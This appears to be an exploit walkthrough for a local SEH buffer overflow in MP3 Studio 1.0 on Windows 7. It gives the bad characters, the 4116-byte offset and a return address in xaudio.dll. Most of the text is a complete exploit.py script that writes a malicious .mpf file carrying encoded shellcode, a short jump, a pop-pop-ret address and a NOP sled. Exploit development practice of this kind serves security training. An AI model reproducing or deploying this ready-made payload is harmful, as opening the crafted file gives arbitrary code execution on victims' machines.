MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH) Walkthrough

(Updated: )
reference MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

badchar

omitted
\x00\x0a\x0d\x1a

offset

omitted
4116

return address

seh

omitted
xaudio.dll 0x1001f668

shellcode

exploit.py

exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
shellcode =  b""
shellcode += b"\xb8\xcb\xdf\x29\x1c\xda\xc7\xd9\x74\x24\xf4"
shellcode += b"\x5a\x33\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc"
shellcode += b"\x03\x89\xd1\xcb\xe9\xf1\x06\x89\x12\x09\xd7"
shellcode += b"\xee\x9b\xec\xe6\x2e\xff\x65\x58\x9f\x8b\x2b"
shellcode += b"\x55\x54\xd9\xdf\xee\x18\xf6\xd0\x47\x96\x20"
shellcode += b"\xdf\x58\x8b\x11\x7e\xdb\xd6\x45\xa0\xe2\x18"
shellcode += b"\x98\xa1\x23\x44\x51\xf3\xfc\x02\xc4\xe3\x89"
shellcode += b"\x5f\xd5\x88\xc2\x4e\x5d\x6d\x92\x71\x4c\x20"
shellcode += b"\xa8\x2b\x4e\xc3\x7d\x40\xc7\xdb\x62\x6d\x91"
shellcode += b"\x50\x50\x19\x20\xb0\xa8\xe2\x8f\xfd\x04\x11"
shellcode += b"\xd1\x3a\xa2\xca\xa4\x32\xd0\x77\xbf\x81\xaa"
shellcode += b"\xa3\x4a\x11\x0c\x27\xec\xfd\xac\xe4\x6b\x76"
shellcode += b"\xa2\x41\xff\xd0\xa7\x54\x2c\x6b\xd3\xdd\xd3"
shellcode += b"\xbb\x55\xa5\xf7\x1f\x3d\x7d\x99\x06\x9b\xd0"
shellcode += b"\xa6\x58\x44\x8c\x02\x13\x69\xd9\x3e\x7e\xe6"
shellcode += b"\x2e\x73\x80\xf6\x38\x04\xf3\xc4\xe7\xbe\x9b"
shellcode += b"\x64\x6f\x19\x5c\x8a\x5a\xdd\xf2\x75\x65\x1e"
shellcode += b"\xdb\xb1\x31\x4e\x73\x13\x3a\x05\x83\x9c\xef"
shellcode += b"\x8a\xd3\x32\x40\x6b\x83\xf2\x30\x03\xc9\xfc"
shellcode += b"\x6f\x33\xf2\xd6\x07\xde\x09\xb1\xe7\xb7\x10"
shellcode += b"\x18\x80\xc5\x12\x9b\xeb\x43\xf4\xf1\x1b\x02"
shellcode += b"\xaf\x6d\x85\x0f\x3b\x0f\x4a\x9a\x46\x0f\xc0"
shellcode += b"\x29\xb7\xde\x21\x47\xab\xb7\xc1\x12\x91\x1e"
shellcode += b"\xdd\x88\xbd\xfd\x4c\x57\x3d\x8b\x6c\xc0\x6a"
shellcode += b"\xdc\x43\x19\xfe\xf0\xfa\xb3\x1c\x09\x9a\xfc"
shellcode += b"\xa4\xd6\x5f\x02\x25\x9a\xe4\x20\x35\x62\xe4"
shellcode += b"\x6c\x61\x3a\xb3\x3a\xdf\xfc\x6d\x8d\x89\x56"
shellcode += b"\xc1\x47\x5d\x2e\x29\x58\x1b\x2f\x64\x2e\xc3"
shellcode += b"\x9e\xd1\x77\xfc\x2f\xb6\x7f\x85\x4d\x26\x7f"
shellcode += b"\x5c\xd6\x56\xca\xfc\x7f\xff\x93\x95\x3d\x62"
shellcode += b"\x24\x40\x01\x9b\xa7\x60\xfa\x58\xb7\x01\xff"
shellcode += b"\x25\x7f\xfa\x8d\x36\xea\xfc\x22\x36\x3f"

payload = "A" * (4116 - 4)
payload += "\xeb\x26\x41\x41"
payload += "\x68\xf6\x01\x10"
payload += "\x90" * 32
payload += shellcode

with open("exploit.mpf", "w") as fp:
    fp.write(payload)

proof

Open File(s)...